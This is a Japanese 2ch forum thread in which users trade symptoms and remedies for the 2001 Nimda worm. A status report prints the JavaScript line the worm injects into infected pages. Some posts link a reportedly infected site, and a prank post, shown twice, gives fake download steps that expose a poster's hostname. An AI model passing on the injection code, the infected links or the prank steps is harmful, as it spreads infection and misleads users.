*.emlの増殖もないし、ファイルの置き換えも起こらない。
メールも投げてないみたい。

あと思ったんだけど、ウイルスとワームは違うような気がするんだけど、
誰も気にならない?
ワームだったら該当ファイルとレジストリのホック消して再起動でいいけど、
ウイルスだったら怖い。

ホットメールの受信トレイ見に行っても感染する？

IE6にはできたんだけど、さらにjavaの設定いじらないとあかんの？

>>722
ご丁寧にありがとうございました。

>>728
今現在は問題ない。少なくとも自分のアカウントでは。

オンラインウイルススキャンがMC AFEEウィルススキャンが
残っているため起動できません。　

アンインストールもできないの(泣)

>>729
IE6で感染したって人が過去スレにいますね

>>729
とりあえずの対応は完了しているので、あとは予期していないのに出てくる
「ダウンロードしますか？」をキャンセルすることだけ忘れずに。
あと感染していないかどうかのチェックも。

>>731
ありがとうございます。今から見に行ってまいります。

あん、わたしのにもあったわ。sage.exe
なによこれ？

先ずは多重カキコお詫びもうしあげます
>>713 >>721　さん有難うございます


しかしこの板で質問の答えを見る時、メール蘭みたり
斜めに読んでみたり忙しかったです。

>>736
>>716
（今度は間違えてないよな・・(^^;）

sage.exeはSystemAgentかな。
タスクスケジューラを呼び出すやつ？

トルシエの世界っていうＨＰも汚染されているようだ

ttp://www.tnet-inc.com/tr/index.htm

ところでここをMacでみたんだけど大丈夫なんでしょうか？

>726
６をダウンロードしようか迷っている＞６９３です
色々見ていたらフレッツADSLで不具合が出ているとか…
私はフレッツなので思いっ切り躊躇しています。
ああどうしよう。

ＭＳのサイトからIE5.01SP2をﾀﾞｳｿしたんだけど、
バージョン情報で確認すると5.00.3314、更新;;SP2;になってる。
ｺﾚﾃﾞｲｲﾉ？ｶﾞｲｼｭﾂだったらｽﾏｿ

>>740
感染済みでした。

ｽﾚ違いどころか、板違いかもしれませんが･･･
ＺＡの警告の所にＩＰみたいの出るじゃないですかぁ。
これで、何が分かるんですか？

>>741
止めた方が良いと思う
漏れはＩＳＤＮだが、２ちゃんねるの特定の板が見れなくなったり
バグが多かった
結局５．０１ＳＰ２にした

>>745
2ちゃんねるの特定の板が見れないのは２ちゃんねる側のバグだとおもわれ。

5.5SP２でADSLだけど問題なし。
ところでトレンドマイクロのオンラインチェックに入れない…一杯なの？

tracert IP
解ってどうする？who is？

　

>>551
ほんとうにありがとう・・・

ドライブの共有の話が出て来たけど、
俺はwin2000使ってるんだけどパソコン起動させるたびに
ドライブが共有する設定になってるんだけど、なぜですか？

共有しないの方にボタンを移動させても再起動すると戻っています。

>>748
どんな攻撃を受けようとしてたのかってのを
知りたい時は、どうしたら良いんですか？

>>751
それはOS上の機能で強制的に共有する("C$", "D$", etc.)ようになっているからです。
特に問題はありません。

スレ違いの教えてくんウザイ

>>752
どんな攻撃なのかはパケットをキャプチャするソフトウエア
(unix系ならtcpdump, Windows系ならSniffer(売り物)とか)
を使って解析するという方法しかないのでは。

ZoneAlarmである程度までなら解るとは思いますが。

>744
このスレとは関係ないから
セキュ板で聞いてください。
たぶん痕跡がなければ答えは出ないけどね。

ウチの部署はカンケーねーや…なんて思ってたら
アホ課長のPCがやられてたよ｡｡｡ネット感染じゃなくて多分
共有フォルダからの感染だよ　　　　ムカツク！
今見たらプリンターまで使えなくなってるよ〜〜
PCの環境によって症状に違いが出るのかね？？

このまま帰ったら明日の朝、課長が大騒ぎだろうな…
まるで天地がひっくり返ったかのように大騒ぎだろうな…
でも今日、これから再インストールは嫌だなぁ｡｡｡
なんかいい方法ないっすかね？＞ALL
多分、漏れと同じ境遇のお人は多いと思われ

http://www.orico.co.jp/

　OCNユーザ限定だけだけど、オンラインチェック受けられるサービス発見。
　OCNユーザは使ってみて。
http://www.ocn.ne.jp/ocn/mem/m_form/onlinescan/use.html

>>757
激しく同意。
早く帰りたい。腹減ったー。

5.50をSP2に揚げたらぽこぽこ落ちるぞ。
その度に「報告しますか？」つてなんか通信しておもしろいから
放ってるけど。

>>758
うざい。ふむなよ。感染するぞ。

先日ＩＥ5.5SP２をダウンロードしたんだけど、「IEに問題が発生しました」とか
いうダイアログが出てブラウザ全くたちあがんなかった。
強制終了も出来ず、コンセント切って結局5.01SP2にに戻した。
この状態で6．0DLしてもまた上手く行かない気がする・・・。
しかもウチフレッツだし（鬱

>>761
それWinが死にかけてる
Windows2000を入れ直せ

１．IE5(;´Д`)
２．とりあえずMcAfeeだけどｳｲﾙｽｽｷｬﾝしてみた→検出されず
３．ﾌｧｲﾙ検索で過去ﾚｽの３つの文字列を検索→検出されず
４．ただいまIE5.01SP2をあぷでーと中。

これで防げますか？ﾀﾞｳｿ終わったらjavaとか切ろうと思うのですが。
日本語変だな・・・。どなたかお答えお願いします・・・。

>>714
Shuriken Proの方が使いやすいと思うけど

>>747
えっ、普通に入れるよ?
http://www.trendmicro.co.jp/hcall/scan.htm

>>757
とりあえず全てのPCからネットワークケーブルを外す。
かつ、接続しているハブの電源を落として、電源アダプタごと回収。

スイッチングハブのような高級ハブならポート単位でON/OFFできると思うので、
もしそのような環境なら全てのポート（自分が使っているモノは除いて）OFF。

すると明日は「つながらねーぞ」と片っ端から連絡があるはずなので、連絡が
あった順に手順を教えて、対応が完了したところからネットワークに繋げられる
ようにすると良い。

フレッツISDNでIE5.5SP2だけど問題なくサクサク動いてるよ

>>686
遅れてすみません。
ありがとうございました！
さっそくやってみます、勉強不足でした。

今回のは、イソテルのマッチポンプでしょ

>>747
JAVAとかアクティブＸとか
切ってるんじゃないの？
切ってたらオンラインチェックできなくない？

>>765
McAfeeのパターンファイルは最新のモノ？
最新であれば問題ない。あとは社内とかのPCであれば共有フォルダ越しに
感染させられないよう注意。

http://www.orico.co.jp/

皆良い人ばかりだ・・・
日本もまだまだ捨てたもんじゃないな・・・

JavaもJavaScriptも切ってるから漏れはだいじょび

NHK見れ！！

NHKあげ

>>773
>>774
ﾜﾛﾀ

>>772
最新にしてからｽｷｬﾝしましたです。
あとは自宅の個人PCなので・・・大丈夫かな。

ありがとうございましたヽ(´ー｀)ノﾁｮﾋﾟﾘｱﾝｼﾝ

ほんとだ。。。NHKでやってる

McAfeeプレインストール版あるけどバージョン３なんです
ＨＰでは更新は終了みたいだし・・・。

NHKでニュースやってる
財務省でも感染だとさ

>>781
新しいバージョンを買うか、それでなければオンラインスキャン。
http://www.trendmicro.co.jp/hcall/scan.htm

　官公庁『が』被害とか、被害発見40件って……
　警視庁の能力ってこの程度なのか？＜NHK

国内の被害は４０件とか言ってたけど、その１０倍以上は
被害あるよね？

http://www.zakzak.co.jp/top/3t2001091901.html

２ｃｈだけで４０件以上のカキコを見たけど（ｗ

40件どころの騒ぎじゃない。ウチの研究室にはウチの大学だけでも十数個の
ホストから頻繁にアクセスしてるっちゅーねん。

>>785
100倍くらいはあるように思うのですが。気づいていないか被害届自体を出していないか・・

2chだけにいれば感染しないの？

それをアンインストールしても消せないんだよね・・・。

だからオンラインスキャンもできない・・・。　

ie5.5sp2入れたらタスクスケジューラーがタスクバーから消えた。どーしよう。
そもそもタスクスケジューラーって何ですか？

>>791
きっとそれは必要なデータだけバックアップを取って再インストールしたほうが早いと思う・・

>>790
このスレにもあるけど、リンクを押さないように。
感染してるサイトに行ってしまうリンクが貼られているので。

どうも。

>>792
　定めた時間にアプリケーションを起動するその名の通りのスケジューラ。
　使ってないなら意味ないから無視！

>>767　nanasisan
レスありがとさんです、それに朝からご苦労様です
多分、nanasisanに救われた人は今日だけでも4桁を越えたでしょう

でも、やっぱり今日中に何とかしておかないと…
プリントアウト出来ないだけでも大騒ぎして業務が止まる人達なので｡｡｡
まぁ、漏れも似たようなレベルですが（ｗ
再インストールじゃなくて、再セットアップでも復帰しませんかね？
それか感染して削除したファイルを探して、健康なファイルに入れ替えとか？
ダメかなぁ…　カエリタイ！

スキャンしたらload.exeってのが引っ掛かったんだけど、これってシステムファイルですか？
修復も出来ないし、あぼーんするしかなさそう。

セキュリティレベルも「中」にしてあるのに入れません。
内部サーバ−エラーと出ます。
トップページにはいけるのに↓へは無理。なんでだろう……
http://housecall.antivirus.com/housecall/start_jp.asp

　　　　　　　　 ∧＿∧　♪
　　　　　　　　（　´_ゝ`）　　まあ落ち着けよカスども　聞いてくださいkid rockで「Bawitaba」
　　　　 ／￣ヽ/,― ､＼ o　　　｡｡｡
.:☆　　 |　||三∪●）三m三三Ε∃.　　+
.:*　 　　＼＿.へ--ｲ |　　　　　ﾟ ﾟ ﾟ　♪.
+:..♪.:｡ﾟ*.:..　　/ /　| |　　　　　　.::.
　☆｡:.+::..　　　| .|　 | |☆:.°+　　　　☆.. :
　　　｡*.:☆ﾟx（＿）:｡|＿）*+ﾟ｡::.☆ο::.+｡　*ρ♪.:.

>>702
ありがとうございました。

今ESPNのサイトみてたんだけど、エンコードがいつのいまにかトルコ語になってたんだよね。
これってなんだろ、今までトルコ語エンコードなんてしたことないのに・・・。

　　　　　　　　　　　　　　　＿＿＿＿＿
　　　　　　　　　 　　 　　 /　　　　.//‐||　　＝＝
　　　　　　　　　　 　　 　/∧＿∧ ||　 ||　　／￣￣￣￣￣
　　　　　　　　　 　 　　 /（　´_ゝ`）||＿||　＜　　>>799ふーん
　　 　 　 ぎゃあ!!　　　/ Ｏ⌒⊂　/ 　　　　＼＿＿＿＿＿
　　　　　　　　∧＿∧ /￣￣￣￣/ ￣　　　　＝＝＝＝＝
　　　　　　∩（　´_ゝ｀ |￣￣￣￣||＿　　　　　　＝＝＝＝
　 　　　　 　 ＼　 ☆|□====□| ＿＿/　　　＝＝＝＝＝
　　　　　　　　　＼　 (========)＿＿
　　　　ﾄﾞﾝｯ!　　　（＿）`ー―　　 `ー―

ＭＳＮコミュニティ（ＷＥＢスペース）は大丈夫？

>>796
> レスありがとさんです、それに朝からご苦労様です
いえいえ(__)

> プリントアウト出来ないだけでも大騒ぎして業務が止まる人達なので

業務を遂行するのと、セキュリティを守るのとどっちが大事なのかによると思います。
セキュリティを守るってことはユーザに対して一定の不便を強いてしまうことなのですから。

ウイルスをばらまいて企業の信頼を落とすのと、
業務を一時停止してお客さんに待ってもらうのと、
どっちが耐えられますか？ってことだと思います。

>>801
　エンコードミスは結構よくあること。
　気にしたら負けさ！

>>803
コミュニティのページをいくつか見てみたけど、おそらく大丈夫と思われ。
心配ならIEのバージョンを上げましょう。

あのー↓の修正プログラムを入れるだけじゃダメなんですか？
http://www.microsoft.com/japan/technet/security/prekb.asp?sec_cd=MS01-020

>>795
ありがと。ほっと一安心だーよ。

>>807
とりあえず今回の問題*だけ*を回避するならそれでもかまわない。
ただ、それ以外にも問題があるので、できればバージョンアップ。

>>742です。
IE5.01SP2のバージョン情報は、5.01.****となるのでしょうか？

>>806
即レスどうもです。

>>807
IEを使うのをやめればいい。

>>810
です。"SP2"が「更新バージョン」にあればOK。

”Ｎｉｍｄａ”は”サーカム”と似た動作をしますが、
ＰＣ起動33分の1破壊モードや20分の1HDDあぼ〜んモードは
ありますか？

それと、マイドキュメントに入っている恥ずかしい写真が
アドレス帳のリスト全員に送られてしまうのでしょうか？

そうなると、人生があぼ〜んです。

とりあえず、チェックしたが感染は無し。
5.5+SP2にアップデートしようとしたけど、ビジーで途中でストップ。
みんなやってんだねぇ(;´Д｀)

>>814
http://www.symantec.co.jp/region/jp/sarcj/data/w/[email protected]
を参照。

>809
そうですか・・・何故かバージョンアップが出来ないようなので
今日はとりあえずこれだけ入れておきます。

あと、これを入れるとスクリプトを無効にしなくても大丈夫と言うことでしょうか？

>>817
今回の問題だけならば大丈夫だけど、できればバージョンアップが成功するまでは
スクリプト周りは切っておきましょう。安心の意味合いが強いですが。

>>814
対処方法としてはとりあえず、その写真をUPしてみそ。

>>813
ありがとうございます。
３０分以上かかったのにバージョン情報が5.00.3314、更新;;SP2;だったので、
慌ててました。

>>819
こらこら、嘘を教えてはイカンぞ...

>>820
それでOKっす。

>>804　nanasisan
>ウイルスをばらまいて企業の信頼を落とすのと、
>業務を一時停止してお客さんに待ってもらうのと、
>どっちが耐えられますか？ってことだと思います。

うう、まったくもってその通りです
でも、あの人達を説得する自信が無いなぁ,,,なんて思ってたら
とりあえずウイルス駆除＆再セットアップ＆プリンタドライバ再セットアップで
なんとか(表面上は)復帰したです
潜在的には多分、解決してないんでしょうね｡｡｡
でも、症状が軽かった？かもしれんので、拡散防止をやれるだけやって
今日は帰ります！(Cドライプも開放してなかったし)
頑張って下さい！！＞nanasisan

>818
ありがとうございます。
明日CD-ROMをもらってきて頑張ってみます。

あれっよく見たら、バージョン情報が5.01.****じゃないと
ﾀﾞﾒってこと？　　　　ガーーーーン

は、落ち着かなくて今日眠れないっすね。
私は会社にいた時には知ってたけど、かなり軽視してた。
CODE RED対策は完璧だったので。

んで、今帰ってきてゆっくり２ｃｈ見てたら、どんどん鬱になってきた（ﾜﾗ

ここまでヤバイものとは思ってなかったので、
なんの対策もしないで退社してしまって今非常に激しく鬱。
せめてインターネットの常時回線ぐらいは抜いて帰るべきだった。

明日出社するまでに何も無いことをひたすら祈る（鬱鬱
みなさんどうですか？

　悪い報告も出なくなったけど、ワクチンとかの良い報告も一向に出ないな…

>>822
ウイルスチェックの駆除で感染が取り除けていたら問題ないと思います。

ただ、駆除で稀に必要なファイルまで削除している可能性も捨てきれないので、
もしかしたら明日「うごかねーぞ」って呼び出される可能性があるかもしれません。

そのへんだけご注意を...

>>824
おおっ、見落としてました。少なくとも5.01でないとダメのようです...

>>825
> 明日出社するまでに何も無いことをひたすら祈る（鬱鬱

明日から1週間くらい旅に出ることを強くお勧めします(藁
もちろん携帯電話もPHSもインターネットメールも繋がらない場所に。

２ちゃんの引き篭もり、高給でやとえばいいのになあ、対策やってるお役所は。

>>829
ワシも出来れば雇いたいな・・（「出来れば」だけど）
紹介できる先はいくらでもあるぞ・・・

>>824
大丈夫。
ttp://www.geocities.co.jp/Technopolis/2082/Soft/Ie/OE5str.htm
見てみ。
5.01.....というバージョンは逆に存在しないみたいね。

ttp://www.microsoft.com/windows/ie_intl/ja/download/
ここからIE5.01SP2選んだのに、ﾄﾞｰｼﾃ5.00ﾅﾝﾀﾞｰ

>>831
フォローありがとうです、、
そろそろ疲れてきてるのかな、間違いまくりで済まぬですm(__)m

>>831、アリガトー

昨日、5.5SP2にアップデートしてから終了しました。
さっき立ち上げてからしばらくしたら、
Microsoftの「重要な更新して下さい｣が出たので
Windowsサイトを見に行ってみると、前に更新した
（更新履歴でもインストール済みになってる）
「セキュリティ問題の修正プログラム　2001年4月2日」が
更新されてないよ！って出てきたのですが、なぜなのでしょうか？
再ダウンロードすべきなんでしょうか？

>>835
IEのバージョンを上げたら修正プログラムが入っていない状態に戻ってしまったということ？
とりあえず再ダウンロードして適用しましょう。
IE5.5SP2では適用されていなかった修正なのではないかと。

>>833
頼りにしています。がんばってください。
5.01といいながらバージョン番号を揃えないＭＳ
が諸悪の根源。

MSNのwindows up dateサイトで、いくらやっても「不明なエラーでインストールできませんでした」とでます。
IE5.5+SP2をDLしようとしてるんですが、いま混んでるんでしょーか？？

>>837
ううっ、ありがとうですー

>>838
インストール時にはウイルスチェックをいったんOFFにしないといけないかも。
あと、インターネットオプションのActiveXのセキュリティ設定も要確認。

>>753
遅ればせながらthanks!

>>836 nanasisan
ありがとうございます。
今は混んでるのかダウンロードが
ストップしてしまったので後でやろうと思います。

IEのセキュリティの設定を「高」にするのと
レベルのカスタマイズで色々設定するのとどっちが良いのですか？
とりあえず「スクリプト」が無効になっていれば大丈夫？

http://www.med.kyushu-u.ac.jp/virus/index.html

高にしたらクッキー無効にならないっけ？
書き込みできないよ。個々に設定した方がいいと思う。

>>843
スクリプトまわりが「無効」になっていれば問題ないでしょう。
ただし、IEの古いバージョンだと「無効」が無視される問題もあったような気がしますので過信せぬよう・・・

テレホタイムはどうなるんだぁしょうなぁ。MSN

>>747
トレンドマイクロのサイト全体がパンク寸前。

>>847
あと30分程か・・夜勤★氏の話だと今現在もテレホーダイタイムでの混雑は酷い
らしいので、今回のウイルスも広がりまくる可能性が否定できないなぁ...

＞８４５−８４６
レスありがとう。

今日、ウイルスが実際に届きました。バカみたいに「このファイルを
落として実行してみます？」と聞くのが笑えた。

早速殺しましたけど。

まあ、トレンドマイクロに入れないなら
このことには関係ないがファイアーウォール
もついでに入れとけ。

このスレで今日半日お世話になったものです。すごく感謝しています。
また来て、感動した。涙出そう。
プロジェクトＸをリアルタイムで生体験できた気分だ！　本当にスゴイ。

スクリプト、ジャバ関係はほとんど無効にした。カキコできる範囲で。
テレホで一気に広がるだろうな。

SP2にするためにie5setup.exeをダウンロードしてきて、
実行しましたが、タスクの署名とか言う所でインストールが終了してしまい、
インストールできません。どうすればいいでしょう？

>>855
「タスクスケジューラ」の問題かな。とりあえず無視して問題ないはず。
再起動後、ヘルプ->バージョン情報でバージョンを確認してくだされ・・

ＪＮＢのログイン画面にアクセス出来ないのですが、これって
javascriptとActiveXをオフにしたせいでしょうか？

ドリカスはウイルス騒動もカヤの外・・・

３０分前〜。

テレホ接続の人々ネットにつなぐ。
↓
MSN、ウィルスソフトサイト混雑。
↓
つながんねー後でいっか。
↓
ちゃんちゃん

>>857
JNBって？ jnb.co.jp で良いのかな？
該当ページを見てみたけど、トップページからいきなりMacromedia Flashでした。
従って、ActiveXは少なくともONにしないといけないでしょう。

>>856
再起動したんですが、更新バージョンがSP1のままなんですよ。
どうすれば・・

ぴゅう太でよかったヽ(´ー｀)ノ

>>861
とりあえずインストール時に行うべきこと。
(1) ウイルススキャンは一時的に止める
(2) タスクスケジューラも止める
(3) どうしてもダメなら明日まで待って素直にIE5.5SP2の入った雑誌やプロバイダの販促用CDをもらうor買う
が良いでしょう。

>>860
ジャパン・ネット・バンクのログイン（取引）メニューのことです。
紛らわしくてごめんなさい！

IE5.5 SP2なのに反応したＹＯ！
ttp://www.tnet-inc.com/tr/index.htm

>>864
ちゃんとURLを示してねん :-)

>>862
ﾜﾗﾀ。激しくﾜﾗﾀ。

>>865
IE5.5SP2とかIE6では「ダウンロードしますか？」って出てくるのでそこでキャンセルすれば良い。
それ以前だとそれすら出てこないので問題なのです、、、

IEはウィルスだと聞いたことがあります。
IEのインストール方法をネットに記述することは犯罪ではないのですか？

>863
CDからだと大丈夫なこともあるんですか？

すまぬが誰か今までのベストの対処方法をまとめていただけませんか？
テレ穂タイムまでじかんがないので！
お願いします！
全部読んでいる暇がありませんです（泣

今手元にそのウィルスがあるのですが、
テキストにしてここに貼ったらダメですよね？

ＭＳＮ以外を見てて、感染しそうになったのは
漏れだけなんですか？

v5.5用sp2・・・8Mダウンロードに3分だった。ADSLのヨサを初めて実感・・・

何度もすみません
ここの左上のお取引メニュー（ログイン）なんですが・・・
　　↓
http://www.japannetbank.co.jp/

昨日まではクリックすると普通にウインドウが開いたんですが・・・

>>871
(1) IEのバージョンアップ
(2) 全てのファイルに対してウイルススキャン
(3) 心配ならスクリプトまわりをOFF

>>865のURL行ったら感染するＹＯ！

　　　　　　　 　　　　　／■■■■■＼
　　　　　　　　　　　／　 ■■■■■　.＼
　　　　 　　　　　／　　　■■■■■　　 .＼
　　　　　　　　／　　　　 ■■■■■　　　　.＼_
　　　　　　　.r'ﾞ　　　　　　　　　　　　　　　　　　 iﾞ''
　　　　　　　l　　　　　　　　 __　　　　　　　　　　　i
　　　　　　　l　　　　 :,,r'''￣￣ﾞﾞﾞﾞﾞ''''''''''''-,,_　　　　i
　　　　　　　i　　　;ri!ﾞ　　　　　　　　　　　 ﾞlll;;,　　i
　　　　　　　 '|　 ;lll|l　,,,,:;iiii;,,,,　　　,,,;;lllii;_　 'll|l　 |
　　　　　　　 .'l, ﾚll'l '''　 ,,,,,￣　　　　,,,,,___　 　l|ﾄ,r
　　　　　　　　'|;i|'ﾄ　　:r:'llll''　　　　 ﾞﾞ'ill⌒　　l ﾞ.r'''
　　　　　　　　.l　ﾞﾄ　　　 　　　　　　　　　　　i .|
　　　　　　　　 'l　.|　　:r'ﾞ　/'　　　 !　＼　　　l　|　　　　　　＿＿＿＿＿＿＿
　　　　　　　　　.ll,,) '|!,,,　 .(i;;;;;iiilllii;il)l;'::　,r''| li,,,l　　　　　／
　　　　　　　　　　　|l;,'l||ll!|lll'llllllllllllllllll,'! ||l| ll |!ﾞ　　　　＜　おにぎりﾜｼｮｰｲ！
　　　　　　　　　　　| i‐:ﾘlﾄ:,::;;;;;;;;;;;;;;,,,:l lil　´l!|.;|lﾞ　　　　　＼　　　　　by ﾗﾃﾞｨｿ
　　　　　　　　　　　 '!:ﾄ)' 'li, iiiiiiiiiiiii'.､l.｀ll,,|:(｀ |　　　　　　 　￣￣￣￣￣￣￣
　　　　　　　　　　　 l|!｀r,.('ﾄ.r　i　lﾞ i　 |.　)ﾞl! |
　　　　　　　　　　　　i'!.'il､.'l; .| i'l l. ; l,i,'!!'l;ﾞ;; '|ﾞ
　　　　　　　　　　　　ﾞ 'l;;;l'llll :ili;|.ﾌ/; ,｀ﾄ.ﾞ;l!.
　　　　　　　　　　　　 ;l i;''ll!|_ |_ li,, !,,l'!.lﾚi!ﾄ
　　　　　　　　　　　　 ﾄ .l|l､.lli;l!i'''!,､ r l!(.／
　　　　　　　　　　　　　ﾞ' '!ﾞﾞ llﾚ|l,.;i,i;| ;ｰ.ﾞ
　　　　　　　　　　　　　　　　 ﾞliﾄ　!:!

>>868
ど〜も。
「ダウンロードしますか？」が出てくる前にノートン先生が反応しまくってビックリしましたよ。

時間がない奴、分からん奴、ネタじゃなくネスケを入れとけ。

>>874
httpsのproxyを設定してるか、https自体無効にしてない？
一度設定回りを確認し直した方がよい。

IE5.5SP2にしたしJavaScriptも切ってあるけど、>>865に
行く勇気がない・・・・
でも、行ってみたい・・・・

ウィルス対策ソフトなんて、ヘビーユーザーしか
入れてない気がする。そんなことないすかねぇ？

逆に最近はヘビーユーザじゃなくてもネットやったりしてるしね。

>>871
ここもよくまとまってると思う。
ttp://staff.aist.go.jp/takagi.hiromitsu/intra/security/alert/20010919-1.html
■最悪のウイルス登場MSNが配布 その3■の76さん、感謝。

＞882
出掛ける時も家に鍵をかけない田舎の人間みたいなこというなよ。

>882
あまい

状況報告ver1.05(前編)
対策
1.IE5.01とIE5.5はSP2以外無条件でDL実行してしまうので、感染前ならアップデートする
2.それでもダイアログは開くので、覚えのないファイルはDLしない。
3.ツール→インターネットオプション→セキュリティ→レベルのカスタマイズ
　→java関連とダウンロードのファイルのダウンロードを不許可。

現在わかっている影響
1.メールによるウイルスファイルの頒布
2.WEBコンテンツ閲覧時にそのサーバにウイルスパケットを送り攻撃、感染する。
3.バックドアを開き、クライアントを丸裸にする。
4.大量の*.emlファイルを量産する。
5.感染したPCはCドライブをネットワーク共有する。
6.システムのスローダウン
7.リソースの消耗
8.他のファイルに潜伏する。

メールによる接触時
ウィルス感染したメールを受信したとき、readme.exe はwav（音声）ファイルになりすます。

LANによる感染
　社内に一人でも対策してないひとがいてノーパスとかにしていた場合
　LANの共有フォルダを使っても自己増殖する。

感染鯖
　ソースの最後に<html><script language="JavaScript">window.open("readme.eml", null,
"resizable=no,top=6000,left=6000")</script></html>
が追加される。

ＭＳＮウイルスから完全にＣＰＵを守るソフトをダウンロードできるサイトがあります。
ただし特殊なソフトにつき普通にリンクを張ることはできません。

ダウンロードの方法は
１．書き込みの名前の欄に　http://fusianasan.2ch.net/　と入れる。(裏ドメイン名）
２．E-mail欄に、msn virus killerと入力する。（ログオン）
３．本文に「ウイルス　逝ってよし」を入れて（パスワード）、書込みボタンを押します。
４．タイトルが「ウイルスバスターダウンロード」に変わればＯＫ！
５．サーバーが重いと２chに戻ってくるけど、くじけずに何度も挑戦!
。
　　うまく行くと、目的のページにつながります。
６．家庭の電話回線よりも、企業や学校の専用回線からの方がサーバートラフィックの
　　都合上つながる確立が高いです。

　（注意！）全て半角で入れること！！
　　　　　　　２３：００〜０３：００の間はつながり難いです！何度もトライ！
　　　　　　　http://fusianasan.2ch.net/←は、裏ドメインの為「直リン」で飛んでも
　　　　　　　「鯖が見つかりません」になります。入り口は「表２ch」のＣＧＩだけです。

　

http://www.backweb.co.jp/
もやられてます。

状況報告ver1.05(後編)
感染の有無の確認
1.●トレンドマイクロ　オンラインスキャン
http://www.trendmicro.co.jp/hcall/scan.htm

2.『*.eml』『readme.exe』『MEP51B3.TMP.EXE』の検索でHIT
　*.emlが大量にHITした際は確定。
　ただし、それが以前に自分の書いた見覚えのあるメールだったら、
それはウイルスではない。
　そうでないときは後者2個を削除して様子を見る。
　といっても後者二つを消したからウイルスが消えるわけではない。
　ファイルのDLを拒否してもファイルが作成されたという報告
(多分一時ファイルに残っているだけだろうが)があるので、
危険ブラウザでない人もファイルのDLを不許可にした方がいい。
3.『mep』で検索した際に『mep????.tmp』がHITする(らしい)


感染時の対応
　感染してしまった後は、アップデートしても無意味。
　とりあえず感染を拡大しないようにウイルス対応ソフトのHP以外には行かず、ワクチンが出来るまで他のWEBコンテンツを回らない。

　感染前に対応ブラウザにして、DL拒否しているのにスキャンで
感染しているというときは多分『インターネット一時ファイル』
に残っているので、気になるならツール→インターネットオプション→
全般→インターネット一時ファイル→ファイルの削除

　ワクチンできたよとかの情報など、追加のフォローさらに宜しく！＞ALL

>>888は嘘です。信じてはいけません :-)
ホスト名が晒されてしまいます。

プロバイダが無料で配布しているCDに入っている
インターネットエクスプローラーはSP2なんでしょうか？

>>888

なんかこーゆーの久しぶりに見たよ。

>>892
それはプロバイダにもよるし、配布時期にもよります。
CD-ROMのどこかにドキュメントがあると思うので、それを参照しましょう。

なつかしいな、おい。>>888

>>892
ありがとうございます。

雑誌に付録されているCDでSP2のバージョンが入っている
ものはないんでしょうか？
友人がみんなダイヤルアップ接続のため、Windowsupdateは
使えそうにないのです。

セキュリティ問題の修正プログラム　ってのはダウンロードしなきゃならないん
ですかね。当方IE5.5SP2をインストしたばかりです。

>>884
ＩＥ６（正式版）はどうなの？

>>897
やるべきだ。

スーパー初心者さんたちは、
ヘブライ語サポート、
アラビア語サポートなんかも、勢いで落としそうな予感

CD-ROMが欲しいという人は、明日まで待たなくても
今すぐにコンビニに逝けばいいんじゃないかい？

最近はどこでもパソコン関係の雑誌がおいてあるし、
添付のCD-ROMにSP2が入っているのもあると思われ。

>>897
入れた方がよいです。はい。

>>896
店頭で探してみることをお勧めします。そんなに苦労なく見つけられると
思いますので。。。

Internet Explorer 5.5 Service Pack 2

http://www.microsoft.com/downloads/release.asp?releaseid=32082
ダウンロードに１時間前後かかります。
テレホはもっとかかるかな？

感染してからバックアップとったんですけど
そのバックアップとったCD見てみたら例のdesktop.emlファイルが各フォルダ毎に１個ずつ入ってました。
これは他のファイルにも感染してて、
違うマシンでこのCDに入ってるファイルを使ったら感染してしまうってことなんでしょうか？

今日IE5.5SP2をインストールしたんだけど
KERNELエラーが出まくりで何度再起動してることか・・・
これってインストールの失敗？ウィルス？

>>865
リンク先からreadme.emlを入手できました。
ありがとう。

>>899
>>902
レスありがとうございます。しかし無茶苦茶重いですね。
で、DL残りあと数KBから動かないんですけど・・・。
待つしかないんでしょうか。

>>904
おそらくはその通り。本当に必要のあるファイル（できれば.jpgとか.gifとか
.txtとかのようにマクロやスクリプトが埋め込まれないものが良い）だけを
バックアップしたほうがよいとおもう。

>>878
おれも見に行ったけど突然ノートン君のレッド画面が！！
ちなみにIE5.5SP2。その後ダウンロードの画面が出たので「キャンセル」。
ブラクラよりたち悪い。おもしろ半分で見に行くのはダメダメ！！

>897
すでにSP2にアップデートしてるのに、古い「重要な更新」
が表示されるっていうパターンかい？

SP2のリリースは今年の8月、重要な更新は4月頃でしょ？
おかしな話だよね。
だから漏れはその更新のアップデートは推奨しない。

>>901　>>902
了解です。
ありがとうございました。

ＭＳＮってなんて読むの？
そのまま？　

財務省もかよ！！！

件名：README
本文：Hi! How are you?
I send you this file in order to have your advice
See you later. Thanks
添付ファイル：README.doc.com、ATT00070.txt
こんなのがメールに来たけどこれもこの関係のウィルス？┐('〜`；)┌

>>914
別件と思われ。まず間違いなくウイルスでしょ。

>>910
IE5.5の開発プロジェクトと5.0のパッチの開発プロジェクトが別々だっていう
こともある（UNIX系では「ブランチ」といったりする）ので、適用したほうが
間違いないかと。

>>897
>>910
http://www.microsoft.com/japan/technet/security/prekb.asp?sec_cd=MS01-020
これのことですか？
これならば5.01も5.5もSP2に含まれてますので不要と思います。
それとも別のでしょうか？

>>912
「えむえすえぬ」で良いはず。"MicroSoft Network" の略。

>>908
やっぱりそうなんですか・・・
どうしよう・・・

ブラウザの立ち上げに異常なほど時間がかかるんですが、ヤバイですか？
修正ファイル落とすのすら満足にできない。

nanasisanの献身的レス、感動！

>>921
　同意！ほんと、すばらしいですね。尊敬します！

がんばれ！nanasisan！

nanasisan、ありがとうございます！

だれかパート２たててください

>>919
とりあえずCD-ROM(CD-Rかな？)に対して全部のファイルをウイルスチェック。
もちろん最新のパターンファイルで。
引っかからないようなら安心して良い。

ﾊﾟｰﾄ2いるの？過去ログ読めば十分じゃん。
甘えすぎ。甘えすぎ。甘えすぎ。

>>925
いちおう立てておいた方が「IEで感染してしまいました」スレが乱立しかねない
状況を考えれば良い考えかと。

>>925
いいこというね

ＭＳＮウイルスから完全にＣＰＵを守るソフトをダウンロードできるサイトがあります。
ただし特殊なソフトにつき普通にリンクを張ることはできません。

ダウンロードの方法は
１．書き込みの名前の欄に　http://fusianasan.2ch.net/　と入れる。(裏ドメイン名）
２．E-mail欄に、msn virus killerと入力する。（ログオン）
３．本文に「ウイルス　逝ってよし」を入れて（パスワード）、書込みボタンを押します。
４．タイトルが「ウイルスバスターダウンロード」に変わればＯＫ！
５．サーバーが重いと２chに戻ってくるけど、くじけずに何度も挑戦!
。
　　うまく行くと、目的のページにつながります。
６．家庭の電話回線よりも、企業や学校の専用回線からの方がサーバートラフィックの
　　都合上つながる確立が高いです。

　（注意！）全て半角で入れること！！
